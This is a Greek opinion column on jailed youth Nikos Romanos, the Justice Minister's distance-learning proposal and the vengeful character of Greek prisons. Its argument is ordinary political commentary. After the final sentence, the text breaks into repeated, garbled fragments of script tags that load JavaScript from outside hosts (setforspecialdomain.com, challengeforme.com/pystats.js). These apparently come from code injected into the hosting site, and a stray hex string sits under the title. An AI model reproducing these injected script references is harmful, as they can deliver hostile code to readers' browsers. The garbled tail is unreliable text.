Ο Ρωμανός και οι τρομοκράτες με τις γραβάτες

62E3ECD0B8993083940158C4110537B3

Νομοθετική ρύθμιση λέει προωθεί ο Υπουργός Δικαιοσύνης κ. Αθανασίου για να μπορέσει να παρακολουθήσει τα μαθήματα της σχολής εξ’ αποστάσεως, δηλαδή μέσα από τη φυλακή ο νεαρός Νίκος Ρωμανός. Μάλιστα διερωτήθει ο Υπουργός γιατί ο Ρωμανός αρνείται να παρακολουθήσει τα μαθήματα εξ’ αποστάσεως «το ζητούμενο είναι να τελειώσει τις σπουδές του ή να βγει έξω;» φέρεται να είπε χαρακτηριστικά.

γράφει ο Γιάννης Δραπανιώτης

Το ζητούμενο αυτή τη χρονική στιγμή κ. Υπουργέ είναι το τι μπορεί να θέλει ο Ρωμανός ή το τι πρέπει να πράξει η πολιτεία; Καταρχάς πριν αναρωτηθεί ότι αναρωτήθηκε ο Υπουργός ας σκεφτεί και ας απαντήσει στο εξής ερώτημα αν μπορεί να υπάρξει παιδεία πίσω από τα κάγκελα της φυλακής. Θα πρέπει να αναρωτηθεί ποιος είναι ο ρόλος του σωφρονιστικού συστήματος, η εκδίκηση του κρατουμένου ή ο σωφρονισμός του και η ομαλή επανένταξή του στο κοινωνικό σύνολο. Θα πρέπει επίσης να αναρωτηθεί το κατά πόσο τρομοκράτης είναι ο Ρωμανός και αν είναι τι τον οδήγησε να γίνει.

Ας σκεφτούμε όλοι λίγο, ας έρθουμε στη θέση ενός παιδιού 15 ετών, που στα χέρια του ξεψυχά ο καλύτερος φίλος του, ο κολλητός, όχι από ατύχημα, όχι από αρρώστια, αλλά επειδή έτσι το θέλησε ένας ανεγκέφαλος «ράμπο» εκπαιδευμένος από την πολιτεία για αυτό ακριβώς το λόγο, για τον έννομο τραμπουκισμό. Τι παράσταση έδωσε, τι παράδειγμα αυτή έννομη πολιτεία σε έναν έφηβο με εύπλαστο χαρακτήρα, ότι στους ατίθασους φυτεύουμε μια σφαίρα. Δυστυχώς αυτή η παράσταση δόθηκε στο Ρωμανό στα 15 – 16 του χρόνια του και αυτή δυστυχώς διαμόρφωσε το χαρακτήρα του.

Μελετώντας κατά καιρούς τα σωφρονιστικά συστήματα ανεπτυγμένων Ευρωπαϊκών χωρών βλέπω πως μια σοβαρή πολιτεία προσπαθεί να δώσει στον κάθε κρατούμενο την ευκαιρία να δει μια άλλη όψη της ζωής απ’ αυτή που έζησε και τον οδήγησε στην παραβατικότητα, ώστε να ενταχθεί όσο γίνεται πιο γρήγορα στην κοινωνία και να μειωθούν στο απειροελάχιστο οι κίνδυνοι υποτροπής του.

Δυστυχώς στην Ελλάδα που θέλει να λέγεται σύγχρονη ευρωπαϊκή χώρα το σωφρονιστικό της σύστημα λειτουργεί με βάση το Μωσαϊκό νόμο δηλαδή οφθαλμόν αντί οφθαλμού με αποτέλεσμα ο κάθε κρατούμενος να μπαίνει στη φυλακή, ας πούμε γιατί είναι μικροδιαρρήκτης της πλάκας και να βγαίνει εγκληματίας ολκής ικανός για κάθε έγκλημα.

Θα αναρωτηθεί τώρα κανείς αν δηλαδή ο Ρωμανός πρέπει να βγει απ’ τη φυλακή. Από τη στιγμή που καταδικάστηκε για παραβατική συμπεριφορά και αδικήματα του ποινικού κώδικα, όχι θα πρέπει να εκτίσει την ποινή του. Τις σπουδές όμως πρέπει να τις παρακολουθήσει στο φυσικό τους χώρο, διότι εκεί μόνο εκεί θα βιώσει ότι και άλλα παιδιά της ηλικίας του, εκεί θα πάρει υγιείς εικόνες και παραστάσεις ικανές να επιφέρουν τον αληθινό σωφρονισμό του και την επανένταξή του στην κοινωνία.

Ας πάψει λοιπόν η πολιτεία να εξαντλεί την αυστηρότητά της και την μανία εκδίκησής της πάνω σε ένα παιδί κι ας αναλάβει τις ευθύνες της. Γιατί  αν ευθύνονται κάποιοι για την παραβατική συμπεριφορά αυτού του του παιδιού, αυτοί δεν είναι άλλοι από κάποιους τρομοκράτες ….με γραβάτες, κουστούμια και στολές.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >